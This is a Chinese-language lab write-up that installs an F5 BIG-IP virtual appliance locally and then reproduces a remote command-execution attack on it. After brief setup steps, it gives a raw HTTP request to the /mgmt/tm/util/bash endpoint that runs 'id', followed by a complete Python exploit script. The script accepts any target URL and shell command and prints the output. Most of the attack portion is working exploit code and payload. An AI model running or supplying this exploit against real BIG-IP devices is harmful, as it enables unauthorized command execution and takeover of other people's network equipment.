安装f5 BIG-IP,fq点击下载

image-20210319164457003

然后双击.ova或者导入VirtualBox中打开虚拟机,设置一个强密码

诶嘿~ 。。我的安好了,特别小,可能是我屏幕分辨率太高的原因,也不太会用这个box
依次输入
root
default
default
123!@#qwe  (随便设置一个强口令,否则无法通过)
image-20210319170318231

获得IP,因为我的屏幕太小,所以用的ifconfig|more一行一行倒的

image-20210319172306832

目标地址:https://192.168.0.107,尝试使用 admin/刚才设置的强口令进行登录,第一次登录让修改密码,照做便是。

image-20210319172937158
image-20210319173206657

Payload

POST /mgmt/tm/util/bash HTTP/1.1
Host: 192.168.0.107
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.0
Authorization: Basic YWRtaW46c3YzbmJlYXN0
X-F5-Auth-Token: 
Content-Length: 42
Content-Type: application/json

{"utilCmdArgs": "-c id", "command": "run"}
image-20210319174457234

Exp

import requests,sys,json
from requests.auth import HTTPBasicAuth
requests.packages.urllib3.disable_warnings()

banner = '''
  __ _____  ______ _____ _____     ___________ 
 / _|  ___| | ___ \_   _|  __ \   |_   _| ___ \\
| |_|___ \  | |_/ / | | | |  \/_____| | | |_/ /
|  _|   \ \ | ___ \ | | | | _|______| | |  __/ 
| | /\__/ / | |_/ /_| |_| |_\ \    _| |_| |    
|_| \____/  \____/ \___/ \____/    \___/\_|    
                                               
                            by 斯文            
'''

def exp(url,cmd):

    try:

        session = requests.Session()

        rawBody = "{{\"utilCmdArgs\": \"-c {}\", \"command\": \"run\"}}".format(cmd)
        headers = {"Accept":"*/*","Connection":"close","User-Agent":"python-requests/2.25.0","Accept-Encoding":"gzip, deflate","X-F5-Auth-Token":"","Content-Type":"application/json"}
        response = session.post("{}/mgmt/tm/util/bash".format(url), data=rawBody,headers=headers, verify=False,auth=HTTPBasicAuth("admin","test"))
        result = json.loads(response.content)
        print(">url: {}".format(url))
        print(">command: {}".format(cmd))
        print(">result: \n\n{}".format(result['commandResult']))

    except Exception as e:
        # print(e)
        print("Not vul")


if __name__ == "__main__":
    print(banner)
    exp(sys.argv[1],sys.argv[2])